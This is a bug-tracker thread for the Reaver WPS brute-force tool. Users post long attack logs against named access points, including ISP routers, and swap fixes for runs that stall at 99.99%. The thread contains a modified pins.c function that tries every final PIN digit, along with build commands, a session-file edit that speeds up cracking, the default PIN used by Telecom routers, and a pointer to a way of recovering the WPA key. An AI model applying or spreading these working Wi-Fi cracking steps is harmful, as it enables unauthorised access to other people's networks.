My favorites | Sign in
Project Home Downloads Wiki Issues Source
New issue   Search
for
  Advanced search   Search tips   Subscriptions
Issue 195: Stuck 99.99%, repeats one key
16 people starred this issue and may be notified of changes. Back to list
Status:  New
Owner:  ----


Sign in to add a comment
 
Reported by darknw...@gmail.com, Jan 28, 2012
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 10.10

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

43db

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -a and sometimes -p argument

6. Please describe what you think the issue is.

I don't know, it stucks to 99% and keeps repeating the same PIN.

7. Paste the output from Reaver below.

It's big so I put it here http://pastebin.com/raw.php?i=RDzF0FBz


Jan 29, 2012
#1 darknw...@gmail.com
nobody?
Jan 30, 2012
#3 davidewe...@gmail.com
Also I've got the same problem... exist a resolution????
Jan 30, 2012
#5 davidewe...@gmail.com
Ubuntu 11.10
  wireless: Broadcrom
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for D4:D1:84:DD:0A:43? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from D4:D1:84:DD:0A:43
[+] Switching mon0 to channel 1
[+] Associated with D4:D1:84:DD:0A:43 (ESSID: Telecom-81594941)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:53:33 (10 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:53:53 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:14 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:54:35 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:54 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:55:16 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
Jan 31, 2012
#6 vladys.3...@gmail.com
my too have similar problem but i don't know what happen :(
Feb 3, 2012
#7 davidewe...@gmail.com
nobody??
Feb 4, 2012
#8 cryptom...@gmail.com
#wps transaction failed (code: 0x02), re-trying last pin
#wps transaction failed (code: 0x03), re-trying last pin

I've experienced the same issues using an Alfa rtl8187. I've found the solution to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 0x03) errors. Then work your way down. Each router I've tested likes a different value. 

I was also using the "--no-nacks" argument.
Feb 8, 2012
#9 saeed.y2...@gmail.com
Hi

I have exactly the same problem 
I also try -d 15 or -N and this solution http://code.google.com/p/reaver-wps/issues/detail?id=88#c4
but it didn't work !

this is my log file
root@bt:~# reaver -i mon0 -b 00:1E:E3:EA:FE:27 -L -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[?] Restore previous session for 00:1E:E3:EA:FE:27? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from 00:1E:E3:EA:FE:27
[+] Switching mon0 to channel 1
[+] Associated with 00:1E:E3:EA:FE:27 (ESSID: WLAN_FE27)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.00% complete @ 2012-02-09 00:18:43 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.04% complete @ 2012-02-09 00:18:58 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Session saved.

and you can download my capture file from here

http://www.mediafire.com/?kzc5utohkjlo67l

it seems there is bug in reaver 1.4 ( stable version )

please consider this issue
I am looking forward to hearing from you soon
Feb 16, 2012
#10 music.an...@gmail.com
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

-76 db

4. What is the manufacturer and model # of the device you are trying to
crack?

ADB Broadband Italia/Pirelli

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv --win7 --no-nacks --dh-small -d 10/15 -c 6 

6. Please describe what you think the issue is.

It seems like the 1st part of the pin 0123 it`s correct and starts with 90% completed. Runs till 99.99% last pin 01239980.
At start ... right after the 90% complete ... if i open the mac.wpc at the 1st line the number it`s 2 - after reading some docs that means the pin it`s fully broken

7. Paste the output from Reaver below.

2
5
1
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
....

Feb 20, 2012
#11 frederi...@gmail.com
I only have sucess using backtrack with -50 signals or higher -45 -40 and so on.

So try to get closer. In Backtrack "the less the better"
Feb 20, 2012
#12 richardj...@gmail.com
Hey .. it seems all Telecom routers are the same .. it gives me the same error,
the 1st 4 digits are correct : 0123 . but the rest is all wrong ..
i can't understand if it's a time of protection or what..
btw i tried on an another telecom router and same thing.

i have access to the 1st one but the pin isn't written anywhere .. i looked around in the settings and info .. but couldn't find the correct one.
it seems the router generates the pin once the button has been clicked.
Feb 21, 2012
#13 fiftyeig...@gmail.com
Same thing here with Telecom router. 
Feb 22, 2012
#14 music.an...@gmail.com
I wanted to add as issue ... wps protection enabled but the method to register with the AP it`s by "Push Button" instead Pin.
Btw richardj ... i tested on a telecom modem also :) .

Anyway i think that wash+reaver should make the difference between push button and pin . Will save us from a lot of wsted time :D
Feb 26, 2012
#15 fiftyeig...@gmail.com
It shouldn't matter if it's a push button pin. You still can become a registrar by trying out all the pins. It must be something else.
Mar 18, 2012
#16 music.an...@gmail.com
3rd Telecom modem/router - same old damn issue :) 0123 correct . 2nd part waste of time.
Off-topic: I hate Telecom :)
Mar 18, 2012
#17 alksande...@gmail.com
Hi All
I have sams issuse , how to fix ? I use rever -1.3 and rever 1-4. But don't work all

Mar 23, 2012
#18 klui...@gmail.com
I tested many ADSL modems .....Planet ADW-XXXX .....such problem with rlt 8187b and Ar9002WB-1NG ...BACKTRACK 5 R2.... They are telecome too!!! please help
Mar 23, 2012
#19 saeed.y2...@gmail.com
Any body could analysis the problem ?
Mar 23, 2012
#20 klui...@gmail.com
Somebody knows as to write to the author of the program directly?
Mar 23, 2012
#21 klui...@gmail.com
This proplems is only with telecom modems!!!!! PLEASE HELP!!!!!
Mar 27, 2012
#22 livewin...@gmail.com
telecom of which country? :D
Mar 28, 2012
#23 klui...@gmail.com
pridnestrovian moldavian republic
May 24, 2012
#24 xpresspa...@gmail.com
I had reformatted my system just cause I allocated partitions wrong...after installing BT5R1 
I started getting this error...I did apt-get update to make sure I was upto date.

---Then I got the wicd dsub interface error which I corrected with : 

-reconfigure wicd
update-rc.d wicd defaults

---Still, got the repeating error stuck at 99.9% so I went and did this POST #3 :

http://code.google.com/p/reaver-wps/wiki/Resources

---Still getting the error after all that, I decided I'd start the process over and not resume...lo and behold it got all the wps and wpa keys.

In my troubleshooting process I removed macchanging as I find it to give me errors every so often

My cli started out as :

Reaver -i xxxx -b xx xx xx xx -w -N -S --mac=xx xx xx xx

Then it ended up as 

Reaver -i xxxx -b xx xx xx xx -w -N -S -l 300 

Not sure if this will help anyone, but this is what I did to get past the 99% problem.



Aug 31, 2012
#25 Leonardo...@gmail.com
I was having the same problem also, I had manually put the first half of the pin trying to accelerate the the process and started at 90.01 % then it was trying different pins but only the second half was changing since I had put the first half manually. After it reached 99.99% it stopped trying different pins, so I terminated the process and started from scratch this time without manually putting in the first half of the pin. Then I saw that the first half was wrong even though it started at 90.01%. Mind you I never saw a "Receive M5 or M6 message " when the first half of the pin was wrong. Probably start over again and see if it works without the -p argument.
Sep 4, 2012
#26 stefano....@gmail.com
Good evening
I can tell you the reason for this issue and how to solve. I came across the solution in these last 3 days spare time. it took me some "mumble mumble" and a little bit of coding.

You get 99.99% and stuck because reaver has attempted all the pins that knows.
So what if the right pin is not in the knowledge of reaver?

While the first 7 digit are consecutive numbers last digit is a checksum.
so reaver attempt 10^7 pins not 10^8 (and that's good!)

But what if the target AP PIN is one of the 9000 not computed?

Solution:
With a exhaustive attempting (small modification of code under /src/) in the range from 01230000 to 01239999 you will find the right pin (first 4 digit are those recognized by reaver).
These are 10^4 pins that for 7sec./pin it will take 19hours and 30minutes to look for them all.

conclusion:
luckily it took me 5hours (more or less 2500 attempted pin), thats because of how I implemented the exhaustive algorithm and because the pin was 01234567 (yes seriously, you can expect others to be 12345678).

next issue:
a this point reaver communicate that this is the right pin but doesn't give WPA PSK.
I used the wpa_supplicant & wpa_cli method (issue 203 comment 6) and it works like a charm! 
now the problem is that after retrieving psk and connected with success, AP has turned off WPS, I don't mean WPS LOCK, I mean there is no more the AP under WASH and if try to associate thru aireplay (I always used it to associate during pin attempts) give this error message:Denied (code 12), wrong ESSID or WPA ? 

from now I will shut connection with this AP for 12 hours to see if it turns WPS up again.

hope that all the things I wrote are interesting for someone!

saluti!
Sep 7, 2012
#27 stefano....@gmail.com
I got some news

shutting connection it's useless about WPS reactivation.

!!! after 48 hours the AP has rebooted by itself reactivating WPS with same old pin. !!!

yesterday I tried to reactivate from telnet but there is no command to accomplish the task (some router has it).

from 'system shell' I found some directories named "wps...." but didn't had time to discover.

a couple of thing about this AP I found in 'system ver':
Version: 4.5.3.AGPWI_1.0.3
Platform: P.DG A4001N

that's all folks!
saluti!
Sep 11, 2012
#28 Twai...@gmail.com
So you got through the 99,99% error by adding some modifications into /scr/???
Would you please share your modifications here? I'm dealing with this issue as well: I'm testing Reaver with many different commercial routers I own, but it doesn't seem to work with any of them....and the developer has not been updating it in months....

Thanks in advance

Sep 14, 2012
#29 bemono...@gmail.com
I'm dealing with this issue as well 99.99%.on BT5 R1 BT5 R3> reaver 1.3 or 1.4 .Please help.
Sep 24, 2012
#30 dnd...@gmail.com
Stefano, thank you very much!
As described in issue 203 comment 6, wpa_supplicant works perfectly. My Telecom was 01234567 too. It seems all Telecom routers have this pin by default.
It would be very useful if there was an option in reaver to ignore calculation and bruteforce last checksum digit.
Sep 24, 2012
#31 keyfo...@veryrealemail.com
Has anyone managed to work out what modifications Stefano made ? :(
Sep 29, 2012
#32 leonardo...@hotmail.it
Stefano seems to have found the problem to the block, could you post the changes you made, so that you can imitate? thank you very much
ps sorry for my english    :-)
Oct 9, 2012
#34 mradulov...@gmail.com
Stefano, I have 99.99% problem too. Where I found the modifications pins.c for resolve this and how to implement it? If I use reaver-1.4 the first 4 digits PIN is 1234 ever and it happens 99.99% problem. On reaver-1.3 the first 4 digits are variable but no crack PIN found.
Oct 10, 2012
#36 mradulov...@gmail.com
... and reaver start from 90%. I tried -p option with 0123,0000, always the same.
The signal strenght is -78 to -82, maybe that's the problem?
Oct 13, 2012
#37 Twai...@gmail.com
@ Stefano (comment 33):
I tried the wpa_cli method you suggested with what should be T*****m's default wps pin, but no luck, so I guess I'll need to figure out and push in your modifications,to test my routers against it.
I read both the info links and the pins.c file you mentioned above, but no luck.
I'm no coder at all but, afaik, the only way should be changing the code to make pin tests try combinations starting with a '0' , as well as ordinary ones...am I right?
As I said, I'm no coder, but I'll appreciate any help on the matter at hand...
Oct 15, 2012
#39 ingen...@gmail.com
So how do we edit the source (I'm assuming pins.c) to not do the sumcheck and instead check the entire keyspace? Can you be specific on what needs changed?
Oct 21, 2012
#40 Tys...@gmail.com
First of all excuse my english.

@ Stefano hit the point.

I had the same problem, after many tries i only got the first part of the Pin, and it stucks on 99.99% trying the same pin.

I looked to the pins.c and i made a quick fix, the idea is:

First: Tries ALL the keys, ending by 0. If u have the first part of the pins, it takes 1000 tries. (tries -p xxxx0000 and u will see reaver changes it to xxxx0002, so the pin xxxx0000 will never be tested).

Second: If the pin not ends by 0, tries all the pins ended by 1, after that, ended by 2, etc...

So i change the line

snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

for

snprintf(pin, pin_len, "%s%d", key, 0);

Look at the change, i changed wps_pin_checksum(atoi(key)) for '0' , that's is it will generate keys ended by 0.

After tried all the keys ended by 0, with no luck, i probed this

snprintf(pin, pin_len, "%s%d", key, 1); --> All the keys endend by one.

I got luck, the key ended by 1, and got found at 93.15%

(Remember, after editing the pins.c, do 

gcc -c pins.c
make
make install

I know it's a not well done fix, but i'm not a c programmer.

Hope help someone.
Oct 22, 2012
#41 stefano....@gmail.com
I'm proud of you Tystar! 
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);
		
                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
				
                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

		if(exhaustive_last_digit==0)
		{
			if(exhaustive_index==999)
			{
				cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
				/* Clean up and get out */
				globule_deinit();
				exit(EXIT_FAILURE);			
			}
			exhaustive_index++;
			exhaustive_last_digit=9;
		}else{
			exhaustive_last_digit--;
		}
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-actual reaver have to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-modified reaver have to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin). 
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.

Oct 23, 2012
#42 cyberfa3...@gmail.com
 Sorry , about my English.. 
I have %99.9 problem too reaver 1.4 [it starts %90]  (first four digit 1234.) But when I tried reaver 1.3 [it starts %0.0] However it stuck 90.9 with the same pin->(first four digit 5323)  and I am trying to find solution..
STEFANO I did your solution alternately. But 'reaver' didn't open after I wrote these to consol " 
cd /root/reaver-wps-read-only/src
./configure
make distclean  
cd /root/reaver-wps-read-only/src
./configure
make
make install  
"
The second questions: Are we sure about stuck pin%99 (1234....) is the correct first four digit? 
Finally: in pins.c folder , we erase everything inside and copy your things is it true ?? Help pls, I am a bit of noob. :) Thanks a lot!
Oct 25, 2012
#43 cyberfa3...@gmail.com
Stefano I solved my 2 problems :) and being pinned reaver 1.3 (modified) it's about %25 now . But still I am not sure about stuck pin first four digit (1234) are correct :((
Oct 28, 2012
#44 cyberfa3...@gmail.com
reaver 1.4 stuck %99 1234abcd ,, reaver 1.3 stuck differet pins 5041klmn what can I do? There is no solution for me?!   
Jan 29, 2013
#46 sergey...@gmail.com
same problem
same pin 12349982
Apr 12, 2013
#48 s.wra...@gmail.com
guys wht can i do for stuck %90.90
May 7, 2013
#49 alfdi...@gmail.com
Stefano,
I'm not shure that the mod at #41 post is correct.

I tried it, without the option -p, (my pc is faster then 3 sec/pin), and both half pin - the first 4 pins and the second 4 pins - increased of 1.

ex:
00010001
00020002.

So not all pins are tried.

I'm not a programmer, so, may you correct the algorithm?
May 10, 2013
#50 rnaa...@gmail.com
try wpspingenerator
May 29, 2013
#51 morenohe...@gmail.com
I Have The solution to resolve these problems. Rebuild the Pin guide file.

	Reaver scan stops working, stacking at 9x.xx% or 99.99%. Sometimes repeats the same pin in loop and get WSC error.  

Don’t know how and why these problems occur. Maybe a little bug in reaver or the AP changes the pin in meantime. 
	 But after a little research and some close tests I manage the solution to resolve these problems. Working fine every time when these errors happens.

	First of all you have to be 100% sure that following things are ok:

*** The first 4 digits of pin. (THIS IS MOST IMPORTANT). I’ll show in the final of post how to know if is real true) 

*** Fair/Good Strength and quality of AP signal


My Case:
>>ESSID: TP_LINK-PSC
>>BSSID: F4:C3:F6:01:BD:1A
>>CHANNEL: 2
>>PIN First 4 DIGITS: 9104

Lets Begin:
     1---You need to locate the reaver work directory, their will be a file with name “bssid of AP”.wpc and reaver.db 

my case: 
/usr/local/etc/reaver/  make a backup of this directory and erase that two files. 
F4C3F601BD1A.wcs and reaver.db

    2----Set the Wi-Fi card in monitor mode in same channel of the target AP

    3----Now start a new reaver scan, reaver  -i “interface” -b  “bssid” -e “essid” --t "time to wait M5/7" c “channel” -vv -n 
In my case the input was:
reaver  -i mon0 -b F4:C3:F6:01:BD:1A -e TP-LINK -t 0.9 -c 11 -vv -n 
then press enter, you should see something like this

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 2
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 12345670


(Note: you SHOULD NOT see the Restore question yet, if you do,  something is wrong. stop and Check if you are in the right directory. You can use the command locate reaver.db to find the right one.)

After the THIRD pin check, stops the scan with CTRL+C  ^c  
my case the third was 01230153

[+] Trying pin 01230153
^C
[+] Nothing done, nothing to save.


-----4----Now comes the trick. In the reaver work folder open the "essid".wpc file and you will see the are one column with multiple lines 
each line with 4 numbers, this numbers are the sequence that reaver will follow to  find the first four numbers of pin.
 So edit end change the 3333 and put your four digit.
my case
cat F4C3F601BD1A.wcs
2
0
0
1234
0000
0123
1111
2222
3333   >  change for you first 4 pin number  
4444

    then
2
0
0
1234
0000
0123
1111
2222
9104
4444

 Save and run reaver again. 
This time WE WANT restore the previous scan

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>


[+] Switching mon0 to channel 2
[?] Restore previous session for F4:C3:F6:01:BD:1A? [n/Y] y
[+] Restored Previous Session
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
